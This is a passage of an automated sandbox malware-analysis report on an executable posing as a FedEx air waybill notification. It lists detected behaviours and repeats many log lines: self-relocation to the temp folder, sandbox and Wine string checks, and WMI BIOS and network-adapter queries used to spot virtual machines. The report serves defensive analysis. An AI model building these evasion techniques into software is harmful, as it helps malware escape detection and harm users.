                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_00B59347 push ds; ret 0_2_00B5934C
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_00DB9347 push ds; ret 1_2_00DB934C
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_00DB92F5 push ds; ret 1_2_00DB9340
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_00DB9361 push ds; retf 1_2_00DB9364
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.88525497927
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile created: \fedex shipment notification - air waybill fed1007990_a10792.exe
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile created: \fedex shipment notification - air waybill fed1007990_a10792.exeJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Moves itself to temp directoryShow sources
                      Source: c:\users\user\desktop\fedex shipment notification - air waybill fed1007990_a10792.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG721.tmpJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f09098.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f9c210.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239889s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 6036Thread sleep count: 1650 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 5028Thread sleep time: -40928s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 6036Thread sleep count: 439 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239543s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239420s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239309s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239195s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -239063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488Thread sleep time: -238063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488